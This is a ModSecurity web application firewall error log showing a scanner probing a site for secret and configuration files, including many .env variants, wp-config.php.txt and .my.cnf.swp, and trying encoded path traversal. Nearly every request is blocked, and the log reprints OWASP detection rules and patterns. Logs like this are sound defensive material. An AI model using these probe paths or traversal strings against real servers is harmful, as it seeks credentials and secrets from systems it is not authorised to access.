[Tue May 12 06:16:03.254030 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:35988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpg81tk6y7yBJLpJpE0wAAAJc"]
[Tue May 12 06:16:03.292260 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.166:36038] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpgxs7kySIUZ3ORnI1FAAAAQk"]
[Tue May 12 06:16:03.292456 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.166:36038] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpgxs7kySIUZ3ORnI1FAAAAQk"]
[Tue May 12 06:16:03.326996 2026] [security2:error] [pid 1820198:tid 1820219] [client 43.159.143.139:51764] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tct-telecom.fr"] [uri "/"] [unique_id "agKpg81tk6y7yBJLpJpE1AAAAJM"]
[Tue May 12 06:16:03.500685 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpgtr1yOh9TvizezitYwAAAFY"]
[Tue May 12 06:16:03.505202 2026] [core:error] [pid 1825179:tid 1825212] [client 45.148.10.166:36022] AH10244: invalid URI path (/files../../../.env)
[Tue May 12 06:16:03.534011 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKpg9r1yOh9TvizezitcAAAAFY"]
[Tue May 12 06:16:03.534096 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKpg9r1yOh9TvizezitcAAAAFY"]
[Tue May 12 06:16:03.534145 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKpg9r1yOh9TvizezitcAAAAFY"]
[Tue May 12 06:16:03.534193 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKpg9r1yOh9TvizezitcAAAAFY"]
[Tue May 12 06:16:03.534320 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKpg9r1yOh9TvizezitcAAAAFY"]
[Tue May 12 06:16:03.593853 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:35892] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpg81tk6y7yBJLpJpE1QAAAIs"]
[Tue May 12 06:16:03.593943 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:35892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpg81tk6y7yBJLpJpE1QAAAIs"]
[Tue May 12 06:16:03.594115 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:35892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpg81tk6y7yBJLpJpE1QAAAIs"]
[Tue May 12 06:16:03.659662 2026] [core:error] [pid 1808852:tid 1808875] [client 45.148.10.166:36052] AH10244: invalid URI path (/files../../../../.env)
[Tue May 12 06:16:03.674206 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.166:35976] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/config/.env"] [unique_id "agKpg_aAnTZtx1_H_wzF5gAAAUk"]
[Tue May 12 06:16:03.674403 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.166:35976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/.env"] [unique_id "agKpg_aAnTZtx1_H_wzF5gAAAUk"]
[Tue May 12 06:16:03.729158 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpgvaAnTZtx1_H_wzF4wAAAVI"]
[Tue May 12 06:16:03.750913 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.development"] [unique_id "agKpg_aAnTZtx1_H_wzF5wAAAVI"]
[Tue May 12 06:16:03.751114 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.development"] [unique_id "agKpg_aAnTZtx1_H_wzF5wAAAVI"]
[Tue May 12 06:16:04.218717 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.166:35852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpgxfeipD4uoG21Fo_nAAAABY"]
[Tue May 12 06:16:04.240140 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpghfeipD4uoG21Fo_mgAAABE"]
[Tue May 12 06:16:04.253374 2026] [core:error] [pid 1808852:tid 1808877] [client 45.148.10.166:35852] AH10244: invalid URI path (/../.env)
[Tue May 12 06:16:04.256110 2026] [security2:error] [pid 1825179:tid 1825217] [client 45.148.10.166:35866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpgtr1yOh9TvizezitZAAAAFM"]
[Tue May 12 06:16:04.271535 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.bak"] [unique_id "agKphBfeipD4uoG21Fo_oQAAABE"]
[Tue May 12 06:16:04.271770 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.bak"] [unique_id "agKphBfeipD4uoG21Fo_oQAAABE"]
[Tue May 12 06:16:04.339739 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.166:35956] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKphBs7kySIUZ3ORnI1FgAAAQY"]
[Tue May 12 06:16:04.339966 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.166:35956] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKphBs7kySIUZ3ORnI1FgAAAQY"]
[Tue May 12 06:16:04.755839 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.166:35872] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpghfeipD4uoG21Fo_mQAAAAY"]
[Tue May 12 06:16:04.768961 2026] [security2:error] [pid 1844863:tid 1844877] [client 5.135.131.226:51838] ModSecurity: Warning. Matched phrase ".my.cnf" at ARGS:edit. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .my.cnf found within ARGS:edit: .my.cnf.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agKphPaAnTZtx1_H_wzF6QAAAUg"]
[Tue May 12 06:16:04.769562 2026] [security2:error] [pid 1844863:tid 1844877] [client 5.135.131.226:51838] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agKphPaAnTZtx1_H_wzF6QAAAUg"]
[Tue May 12 06:16:04.792468 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.166:35872] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKphBfeipD4uoG21Fo_ogAAAAY"]
[Tue May 12 06:16:04.792667 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.166:35872] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKphBfeipD4uoG21Fo_ogAAAAY"]
[Tue May 12 06:16:04.792674 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.166:35946] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/local/.env"] [unique_id "agKphPaAnTZtx1_H_wzF6gAAAU8"]
[Tue May 12 06:16:04.792805 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.166:35946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/local/.env"] [unique_id "agKphPaAnTZtx1_H_wzF6gAAAU8"]
[Tue May 12 06:16:04.806013 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:35912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpg81tk6y7yBJLpJpE0gAAAI0"]
[Tue May 12 06:16:04.828909 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:35912] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php.txt"] [unique_id "agKphM1tk6y7yBJLpJpE1wAAAI0"]
[Tue May 12 06:16:04.829102 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:35912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php.txt"] [unique_id "agKphM1tk6y7yBJLpJpE1wAAAI0"]
[Tue May 12 06:16:04.965498 2026] [security2:error] [pid 1844863:tid 1844877] [client 5.135.131.226:51838] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKphPaAnTZtx1_H_wzF6QAAAUg"]
[Tue May 12 06:16:05.637213 2026] [security2:error] [pid 1825179:tid 1825207] [client 45.148.10.166:36074] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.save"] [unique_id "agKphdr1yOh9TvizezitcwAAAEk"]
